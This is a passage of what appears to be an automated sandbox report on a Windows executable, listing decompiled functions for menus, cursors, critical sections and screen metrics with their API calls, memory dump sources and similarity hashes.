				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403584(1);
				_push(_t77);
				_push(0x424ccf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x412210; // 0x41225c
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x48fa44);
				L00406840();
				_push(_t77);
				_push(0x424d2f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E0042367C( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00423678(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x424d36);
				_push(0x48fa44);
				L00406990();
				return 0;
			}

0x00424c49
0x00424c4b
0x00424c55
0x00424c64
0x00424c69
0x00424c6a
0x00424c6f
0x00424c72
0x00424c78
0x00424c7e
0x00424c91
0x00424c91
0x00424c99
0x00424ca3
0x00424cae
0x00424cae
0x00424cb4
0x00424cc2
0x00424cc7
0x00424cca
0x00424ce6
0x00424ceb
0x00424cf2
0x00424cf3
0x00424cf8
0x00424cfb
0x00424d04
0x00424d0f
0x00424d12
0x00424d19
0x00424d1c
0x00424d1f
0x00424d24
0x00424d29
0x00424d2e

APIs

RtlEnterCriticalSection.KERNEL32(0048FA44,00000000,?,?), ref: 00424CEB
RtlLeaveCriticalSection.KERNEL32(0048FA44,00424D36,0048FA44,00000000,?,?), ref: 00424D29

Strings

LA, xrefs: 00424C5A
\"A, xrefs: 00424CB4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: LA$\"A
API String ID: 3168844106-2100970992
Opcode ID: e31419e8f99c5b5e35767a0b1d708b11f7f69802d26a11b41ed14e46dd6906ae
Instruction ID: 3fe710d31c7b0d7ffea7adcd7f6d7e37885143c0d0e6751d88494af2f7d13176
Opcode Fuzzy Hash: e31419e8f99c5b5e35767a0b1d708b11f7f69802d26a11b41ed14e46dd6906ae
Instruction Fuzzy Hash: 8B217F74B04304AFC711DF69D881989BBF5FB88720B5185AAEC04A7761C778AE40CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0044C174, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044C174(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x48e85c; // 0x48f7f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044C4F8(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044C4F8(_t29) & 0x0000007f) << 0x0000000d) + ((E0044C4F8(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x0044c176
0x0044c179
0x0044c17b
0x0044c184
0x0044c19b
0x0044c19d
0x0044c1a4
0x0044c1b0
0x0044c1b4
0x0044c1c2
0x0044c1c9
0x0044c1cd
0x0044c1df
0x0044c1e4
0x0044c202
0x0044c206
0x0044c214
0x0044c21b
0x00000000
0x0044c221
0x0044c21b
0x0044c1e4
0x0044c1c9
0x0044c22e

APIs

GetMenuItemInfoA.USER32 ref: 0044C1C2
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044C214
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044C221

Strings

P, xrefs: 0044C1B4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: db82e1dc4962256e1fc868099e69b0e40600b07c7c584f5733a1cdeb67d3eb79
Instruction ID: b11324016f07151bbb3df529ce18a1cfba02fc941874fdd1eeb36abafcf49ae8
Opcode Fuzzy Hash: db82e1dc4962256e1fc868099e69b0e40600b07c7c584f5733a1cdeb67d3eb79
Instruction Fuzzy Hash: DC1104316062006FE350DB28DCC1B5B76D4AF85364F188A69F054DB3D5D7B8D944C74E

Uniqueness

Uniqueness Score: -1.00%

Function 004263D8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004263D8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x4264a1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x48fa2c =  *0x48fa2c + 1;
				if( *0x48fa2c == 0) {
					_t3 =  *0x48fa84; // 0x21d0b50
					E004035B4(_t3);
					_t5 =  *0x471784; // 0x0
					E004035B4(_t5);
					_t7 =  *0x471780; // 0x0
					E004035B4(_t7);
					E0042335C(__ebx, _t27);
					_t10 =  *0x471788; // 0x21d0b74
					E004035B4(_t10);
					_t12 =  *0x48fa80; // 0x21d0bb0
					E004035B4(_t12);
					_t14 =  *0x48fa74; // 0x21d0ad8
					E004035B4(_t14);
					_t16 =  *0x48fa78; // 0x21d0b00
					E004035B4(_t16);
					_t18 =  *0x48fa7c; // 0x21d0b28
					E004035B4(_t18);
					_t20 =  *0x48fa28; // 0x7b0807a3
					DeleteObject(_t20);
					_push(0x48fa44);
					L00406838();
					_push(0x48fa5c);
					L00406838();
					_t34 =  *0x412a64; // 0x412a68
					E00404E00(0x4716a0, 0x12, _t34);
					_t35 =  *0x412a64; // 0x412a68
					E00404E00(0x471518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x4264a8);
				return 0;
			}

0x004263d8
0x004263dd
0x004263de
0x004263e3
0x004263e6
0x004263e9
0x004263ef
0x004263f5
0x004263fa
0x004263ff
0x00426404
0x00426409
0x0042640e
0x00426413
0x00426418
0x0042641d
0x00426422
0x00426427
0x0042642c
0x00426431
0x00426436
0x0042643b
0x00426440
0x00426445
0x0042644a
0x00426450
0x00426455
0x0042645a
0x0042645f
0x00426464
0x00426473
0x00426479
0x00426488
0x0042648e
0x0042648e
0x00426495
0x00426498
0x0042649b
0x004264a0

APIs

DeleteObject.GDI32(7B0807A3), ref: 00426450
RtlDeleteCriticalSection.KERNEL32(0048FA44,7B0807A3,00000000,004264A1), ref: 0042645A
RtlDeleteCriticalSection.KERNEL32(0048FA5C,0048FA44,7B0807A3,00000000,004264A1), ref: 00426464

Strings

h*A, xrefs: 00426473, 00426488

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: h*A
API String ID: 378701848-3610640036
Opcode ID: b290ab754b42c8e6b854fdbbe2cfa56a8dda54a36e490d74d5baecaae7aa22c0
Instruction ID: c13c9e4776f7addb0c49aa7fd2e29796781a16e19696e54c606d4d268705ee95
Opcode Fuzzy Hash: b290ab754b42c8e6b854fdbbe2cfa56a8dda54a36e490d74d5baecaae7aa22c0
Instruction Fuzzy Hash: BC010C70300140ABC729FF6AEC5391D7769E744719391887BB405A7AB2CA7CAD188B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00426C3C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00426C3C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x48fabf != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x48faa0; // 0x426c3c
					 *0x48faa0 = E004269A4(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x48faa0(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00426c42
0x00426c4c
0x00426c76
0x00426c7f
0x00426ca7
0x00426ca7
0x00426c81
0x00426c81
0x00426c86
0x00000000
0x00000000
0x00426c86
0x00426c4e
0x00426c53
0x00426c60
0x00426c72
0x00426c72
0x00426cb2

APIs

GetSystemMetrics.USER32 ref: 00426C8A
GetSystemMetrics.USER32 ref: 00426C9C

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

<lB, xrefs: 00426C53, 00426C60, 00426C6C
MonitorFromPoint, xrefs: 00426C4E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: <lB$MonitorFromPoint
API String ID: 1792783759-2621410050
Opcode ID: db883e686d35021d78765277dda61c9650f74f4c625b5aaa7a89ccad8a76b3d2
Instruction ID: e4eae37c7e228267eb39a01812482bd2883d4e3322c9c4e0897d860edaf3a9f7
Opcode Fuzzy Hash: db883e686d35021d78765277dda61c9650f74f4c625b5aaa7a89ccad8a76b3d2
Instruction Fuzzy Hash: 1901A231300224EFDF046F53EC84B5E7B55EB80764F81843AF9998B611C3759C49C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3B8() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x4710e4 = _t1;
				}
				if( *0x4710e4 == 0) {
					 *0x4710e4 = E00408B04;
					return E00408B04;
				}
				return _t1;
			}

0x0040b3be
0x0040b3c3
0x0040b3c7
0x0040b3cf
0x0040b3d4
0x0040b3d4
0x0040b3e0
0x0040b3e7
0x00000000
0x0040b3e7
0x0040b3ed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C091,00000000,0040C0A4), ref: 0040B3BE
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B3CF

Strings

kernel32.dll, xrefs: 0040B3B9
GetDiskFreeSpaceExA, xrefs: 0040B3C9

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: eb26b233bb6f3c4152a4dbd87045aa75ab81a46f43b9481ac3ee18b98649a16b
Instruction ID: 293807534f544a3f550c89d77f40ca4b3b3a12431bdd46a8951dee4c4cae3754
Opcode Fuzzy Hash: eb26b233bb6f3c4152a4dbd87045aa75ab81a46f43b9481ac3ee18b98649a16b
Instruction Fuzzy Hash: A5D09EB16023C55AD710FBFA6DC179A3158D710318B20903BB606F56E3D7BC88D8969C

Uniqueness

Uniqueness Score: -1.00%

Function 00466CD4, Relevance: 6.2, APIs: 4, Instructions: 225
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00466CD4(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00464468( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E0041FE50( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E0046683C( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E00420140( *((intOrPtr*)( *_t212 + 0x208)));
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E0041FE50( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E00420080(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041F7B8( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041EFCC( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E00464E40(_v36);
					_v38 = E00464554(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043F370( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420244( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00466EB4))) {
							case 0:
								E004668AC(_t213);
								goto L22;
							case 1:
								__eax = E00466AB8(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E00466A08(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E004668FC(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E00466B68(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00466BF0(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x466fc4; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043F370( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x466fc0; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x466fbc; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420244( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}

0x00466cd4
0x00466ce3
0x00466ce4
0x00466ce5
0x00466ce6
0x00466ce7
0x00466cea
0x00466ced
0x00466cf8
0x00466cfd
0x00466d01
0x00466d13
0x00000000
0x00466d1d
0x00466d27
0x00466d29
0x00466d30
0x00466df4
0x00466df4
0x00466e01
0x00466e0c
0x00466e0c
0x00466e12
0x00466e14
0x00466e16
0x00466e16
0x00466e19
0x00466e1e
0x00466e2b
0x00466e38
0x00466e42
0x00466e55
0x00466e60
0x00466e63
0x00466e6d
0x00466e7a
0x00466e7a
0x00466e85
0x00466e90
0x00466e9b
0x00466ea1
0x00466ea8
0x00466eab
0x00466f00
0x00466f02
0x00466f08
0x00466f0b
0x00000000
0x00000000
0x00466f11
0x00466f14
0x00466f18
0x00000000
0x00000000
0x00466f20
0x00466f32
0x00466f35
0x00466f37
0x00466f3e
0x00466f43
0x00466f46
0x00466f48
0x00466f4f
0x00466f51
0x00466f51
0x00466f51
0x00466f51
0x00466f4f
0x00466f56
0x00466f5c
0x00466f5e
0x00466f60
0x00466f62
0x00466f6c
0x00466f6c
0x00466f6c
0x00466f6c
0x00466f62
0x00466f6f
0x00466f71
0x00466f7b
0x00466f7b
0x00466f7b
0x00466f7b
0x00466f80
0x00466f87
0x00466f8c
0x00466f8e
0x00000000
0x00466f90
0x00466f90
0x00466f92
0x00466f99
0x00000000
0x00000000
0x00000000
0x00466fad
0x00466ead
0x00466ead
0x00000000
0x00466ecd
0x00000000
0x00000000
0x00466ed6
0x00000000
0x00000000
0x00466ee8
0x00000000
0x00000000
0x00466edf
0x00000000
0x00000000
0x00466ef1
0x00000000
0x00000000
0x00466efa
0x00000000
0x00000000
0x00466ead
0x00466d36
0x00466d36
0x00466d38
0x00466d40
0x00000000
0x00000000
0x00466d46
0x00466d4e
0x00466d51
0x00466dd5
0x00000000
0x00466de9
0x00466d55
0x00466d5c
0x00466d61
0x00466d63
0x00466db2
0x00000000
0x00466dc6
0x00466d69
0x00466d7d
0x00466d83
0x00466d85
0x00466d8c
0x00466fb8
0x00466fb8
0x00466fb8
0x00000000
0x00466da4

APIs

GetFocus.USER32 ref: 00466D5C
DrawFocusRect.USER32 ref: 00466DA4

Part of subcall function 0041FE50: FillRect.USER32 ref: 0041FE78

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusRect$DrawFill
String ID:
API String ID: 3476037706-0
Opcode ID: bd1b9c483f4283a30740da1dfeb4def7d3740dc75fefb3ab23e5821064b6e37e
Instruction ID: 3fa9c75077b7279c8ffb56afa9de9589e0afa2286d35e8dbe86cf40c3b74eb84
Opcode Fuzzy Hash: bd1b9c483f4283a30740da1dfeb4def7d3740dc75fefb3ab23e5821064b6e37e
Instruction Fuzzy Hash: 33914E34A00105CFCB14EF58D485EAEB7F5BF18304F2544BAE9849B326D739AC86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00436BCC, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00436BCC(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x48fba0 != 0) {
					L3:
					_t49 =  *0x48fb80; // 0x0
					_t50 =  *0x48fb80; // 0x0
					_t117 = E00436AAC(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x48fba0 == 0) {
						_t168 =  *0x48fba4;
						if( *0x48fba4 != 0) {
							_t106 =  *0x48fb94; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x48fba4; // 0x0
							E00440D20(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x48fb80; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x48fba0;
						_t6 =  &_v24;
						 *_t6 =  *0x48fba0 != 0;
						__eflags =  *_t6;
						 *0x48fba0 = 2;
					} else {
						 *0x48fba0 = 1;
						_v24 = 0;
					}
					_t54 =  *0x48fb84; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x48fb84; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						_t14 = _t155 + 4; // 0x0
						 *((intOrPtr*)(_t55 + 0x10)) =  *_t14;
						_t56 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x48fb84; // 0x0
							E00438800( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x48fb84; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t23 = _t155 + 4; // 0x0
						_t131 = E00436AFC(2);
						_t121 =  *_t155;
						_t60 =  *0x48fb84; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *_t23);
						if( *0x48fba4 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x48fba4; // 0x0
								E00440CDC(_t82, _t158);
								_t84 =  *0x48fba4; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t30 = _t155 + 4; // 0x0
									_t121 =  *_t30;
									_t85 =  *0x48fba4; // 0x0
									E00440E08(_t85,  *_t30,  *_t155, __eflags);
								} else {
									_t29 = _t155 + 4; // 0x0
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x48fba4; // 0x0
									E00440D20(_t89, _t88, _t177,  *_t29);
								}
							} else {
								_t91 =  *0x48fba4; // 0x0
								E00440E7C(_t91, _t131, __eflags);
								_t93 =  *0x48e838; // 0x48fc00
								SetCursor(E00456D18( *_t93, _t158));
							}
						}
						_t62 =  *0x48e838; // 0x48fc00
						_t65 = SetCursor(E00456D18( *_t62, _t158));
						if( *0x48fba0 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00436B38(_t121);
								_t67 =  *0x48fb84; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E00438800(_t118,  &_v24, _t155);
									_t65 = E004037B0(_t118, __eflags);
									_t135 =  *0x48fb84; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x48fb84; // 0x0
									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x48fb84; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_t31 = _t155 + 4; // 0x0
								_push( *_t31);
								_t80 =  *0x48fb84; // 0x0
								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x48fb84 == 0) {
								goto L32;
							} else {
								_t119 =  *0x48fb84; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
